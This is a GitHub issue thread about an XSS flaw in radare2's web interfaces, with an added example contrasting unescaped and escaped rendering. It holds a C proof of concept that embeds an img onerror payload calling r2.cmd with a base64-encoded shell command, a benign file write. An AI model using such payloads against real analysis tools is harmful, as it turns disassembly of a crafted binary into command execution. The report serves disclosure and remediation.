The enyo and material web interfaces are vulnerable to XSS
Maijin opened this issue · 4 comments
Maijin commented
Again, this leads to arbitrary command execution.
PoC
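#include <stdio.h>

int main(void)
{
    /* The string literal is stored in the binary and shows up in the disassembly view. */
    printf("<img src=k onerror=r2.cmd(atob('ZWNobyAxID4gL3RtcC9ib28='))></img>");
    return 0;
}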
Edit:
To clarify, this occurs when the string from the binary is shown in the disassembly window.
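The failure described in this comment, as an added example that is not from the issue or from radare2's web UI code: a disassembly line built by string concatenation, next to the same line with every binary-derived field HTML-escaped. The function names, the line structure, and the offset and opcode values are assumptions constructed for illustration; the string is the one from the PoC above.

```javascript
// Added example: all names below are hypothetical, not radare2 web UI code.

// Constructed sample: a disassembly line whose string comes from the analysed binary.
const sampleLine = {
  offset: "0x00400596",            // constructed value
  opcode: "mov edi, str.payload",  // constructed value
  comment: "<img src=k onerror=r2.cmd(atob('ZWNobyAxID4gL3RtcC9ib28='))></img>",
};

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

// Encode every character that can open a tag, an attribute value or an entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: binary-controlled text concatenated straight into markup.
function renderLineUnsafe(line) {
  return `<div class="insn"><span class="addr">${line.offset}</span> ` +
         `<span class="op">${line.opcode}</span> ` +
         `<span class="cmt">; ${line.comment}</span></div>`;
}

// Hardened pattern: every field derived from the binary is escaped first.
function renderLineSafe(line) {
  return `<div class="insn"><span class="addr">${escapeHtml(line.offset)}</span> ` +
         `<span class="op">${escapeHtml(line.opcode)}</span> ` +
         `<span class="cmt">; ${escapeHtml(line.comment)}</span></div>`;
}

// The fixed template contributes exactly 4 opening tags (div + 3 spans);
// any additional tag was injected by the data.
function countOpeningTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

console.log("unsafe:", countOpeningTags(renderLineUnsafe(sampleLine)));
console.log("safe:  ", countOpeningTags(renderLineSafe(sampleLine)));
```

In a browser, assigning the text to an element's `textContent` instead of building HTML strings gives the same result without manual escaping.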
novia713 commented
Been looking for this in the web-ui and didn't find it.
AFAIK this code is in r2, not in the webui.
If I'm wrong, please somebody tell me where this code is.
radare commented
wat
Maijin commented
I have no idea what this is about, I just ripped off the issue from the radare2 repo